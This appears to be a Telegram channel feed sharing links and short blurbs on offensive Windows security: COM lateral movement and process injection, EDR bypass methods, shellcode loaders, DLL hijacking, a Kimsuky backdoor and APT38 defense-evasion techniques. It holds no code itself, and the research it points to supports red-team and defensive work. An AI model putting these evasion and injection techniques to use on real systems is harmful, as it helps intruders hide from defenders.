Lateral Movement using the MMC20.Application COM Object
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
First part
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
👍4
Demystifying Windows Component Object Model (COM)
https://www.221bluestreet.com/offensive-security/windows-components-object-model/demystifying-windows-component-object-model-com
https://www.221bluestreet.com/offensive-security/windows-components-object-model/demystifying-windows-component-object-model-com
221Bluestreet
Demystifying Windows Component Object Model (COM) | 0xShukruN
🔥3👍2
Process Injection via Component Object Model (COM) IRundown::DoCallback()
https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
#malware_dev
From MDSec
https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
#malware_dev
❤3👍3
Forwarded from 1N73LL1G3NC3
Demonstration of pivoting with ZeroTier and Nebula during the post-exploitation process. These tools showcase impressive capabilities such as flexible routing, NAT traversal, and the ability to build tunnels between isolated network segments, granting full access to internal infrastructure.
Thx to my bro @casterbyte
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍5👎1
👍7
Forwarded from CyberSecurityTechnologies (-CST-)
HookChain_new_perspective.pdf
14.4 MB
#Red_Team_Tactics
"HookChain: A new perspective for Bypassing EDR Solutions", 2024.
]-> https://github.com/helviojunior/hookchain
"HookChain: A new perspective for Bypassing EDR Solutions", 2024.
]-> https://github.com/helviojunior/hookchain
👍4❤2🔥1👏1
Kimsuky Group's new backdoor appeared (HappyDoor)
https://web.archive.org/web/20240626161026/https://asec.ahnlab.com/ko/67128/
https://web.archive.org/web/20240626161026/https://asec.ahnlab.com/ko/67128/
🔥3👍2
Forwarded from Offensive Xwitter
😈 [ Check Point Research @_CPResearch_ ]
10 years of DLL hijacking - featuring abused executables that shouldn't have existed, exported and malicious DLLs with discount bin "packing." Includes a PoC for app developers to pre-emptively stop hijacking without dealing with a certificate authority.
🔗 https://research.checkpoint.com/2024/10-years-of-dll-hijacking-and-what-we-can-do-to-prevent-10-more/
🐥 [ tweet ]
10 years of DLL hijacking - featuring abused executables that shouldn't have existed, exported and malicious DLLs with discount bin "packing." Includes a PoC for app developers to pre-emptively stop hijacking without dealing with a certificate authority.
🔗 https://research.checkpoint.com/2024/10-years-of-dll-hijacking-and-what-we-can-do-to-prevent-10-more/
🐥 [ tweet ]
👍5
Source Byte
Process Injection via Component Object Model (COM) IRundown::DoCallback() From MDSec https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/ #malware_dev
Injecting Code into Windows Protected Processes using COM, Part 1 and Part 2 by James Forshaw of the Project Zero team prompted an interest in COM internals and, more specifically, the undocumented DoCallback method part of the IRundown interface.
- POC
#COM
- POC
#COM
👍7
Forwarded from Order of Six Angles
Охуенная статья
Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation
https://blog.fox-it.com/2024/09/25/red-teaming-in-the-age-of-edr-evasion-of-endpoint-detection-through-malware-virtualisation/
Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation
https://blog.fox-it.com/2024/09/25/red-teaming-in-the-age-of-edr-evasion-of-endpoint-detection-through-malware-virtualisation/
Fox-IT International blog
Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation
Authors: Boudewijn Meijer && Rick Veldhoven Introduction As defensive security products improve, attackers must refine their craft. Gone are the days of executing malicious binaries from di…
👍5
The Anti-EDR Compendium
EDR functionality and bypasses in 2024, with focus on undetected shellcode loader.
https://blog.deeb.ch/posts/how-edr-works/
credit : Dobin Rutishauser
EDR functionality and bypasses in 2024, with focus on undetected shellcode loader.
https://blog.deeb.ch/posts/how-edr-works/
credit : Dobin Rutishauser
1👍4
x64 WINAPI Recursive Loader
https://web.archive.org/web/20240928164510/https://github.com/Evi1Grey5/Recursive-Loader
#Loader #malware_dev
"Code provided by smelly - vx-underground"
https://web.archive.org/web/20240928164510/https://github.com/Evi1Grey5/Recursive-Loader
#Loader #malware_dev
👍3
Source Byte
Process Injection via Component Object Model (COM) IRundown::DoCallback() From MDSec https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/ #malware_dev
COM PROCESS INJECTION for RUST
https://github.com/0xlane/com-process-inject.git
#malware_dev
Process Injection via Component Object Model (COM) IRundown::DoCallback().
https://github.com/0xlane/com-process-inject.git
#malware_dev
🔥4
RedTeam Workshop - Part 4
* How do North Korean hackers bypass security mechanisms? *
APT38 attacks simulation , in this section, "defense evasion" was discussed.
https://youtu.be/zDyPRrtXjus?si=265TY6KyElHGr-eR
slides / notes :
https://github.com/soheilsec/RT-workshop-2024
credit : @soheilsec
language : persian
* How do North Korean hackers bypass security mechanisms? *
APT38 attacks simulation , in this section, "defense evasion" was discussed.
Defense Evasion
+ T1562.003 | Impair Command History Logging
+ T1562.004 | Disable or Modify System Firewall
+ T1070.001 | Clear Windows Event Logs
+ T1070.006 | Timestomp
+ T1112 | Modify Registry
+ T1218.001 | Compiled HTML File
+ T1218.011 | Rundll32
https://youtu.be/zDyPRrtXjus?si=265TY6KyElHGr-eR
slides / notes :
https://github.com/soheilsec/RT-workshop-2024
credit : @soheilsec
👍4
How to get the COM concurrency model for the current thread.
by Rbmm & Dennis A. Babkin
https://dennisbabkin.com/blog/?t=things-you-thought-you-knew-how-to-get-com-concurrency-model-for-current-thread
#com #reverse_engineer #cpp
by Rbmm & Dennis A. Babkin
https://dennisbabkin.com/blog/?t=things-you-thought-you-knew-how-to-get-com-concurrency-model-for-current-thread
#com #reverse_engineer #cpp
www.dennisbabkin.com
Blog Author - Rbmm
Information about blog author at www.dennisbabkin.com - Rbmm
🔥6🤡2
Source Byte pinned «Process Injection via Component Object Model (COM) IRundown::DoCallback() From MDSec https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/ #malware_dev»
Function Graph Overview
https://marketplace.visualstudio.com/items?itemName=tamir-bahar.function-graph-overview
https://marketplace.visualstudio.com/items?itemName=tamir-bahar.function-graph-overview
🔥3👍1
ProxyAlloc: evading NtAllocateVirtualMemory detection ft. Elastic Defend & Binary Ninja
In this article, we will explore a method for in-process shellcode execution evasion. This method is specifically designed to avoid the detection of NtAllocateVirtualMemory calls from unsigned DLLs.
https://blog.cryptoplague.net/main/research/windows-research/proxyalloc-evading-ntallocatevirtualmemory-detection-ft.-elastic-defend-and-binary-ninja
credit : Daniil Nababkin
In this article, we will explore a method for in-process shellcode execution evasion. This method is specifically designed to avoid the detection of NtAllocateVirtualMemory calls from unsigned DLLs.
https://blog.cryptoplague.net/main/research/windows-research/proxyalloc-evading-ntallocatevirtualmemory-detection-ft.-elastic-defend-and-binary-ninja
credit : Daniil Nababkin
👍3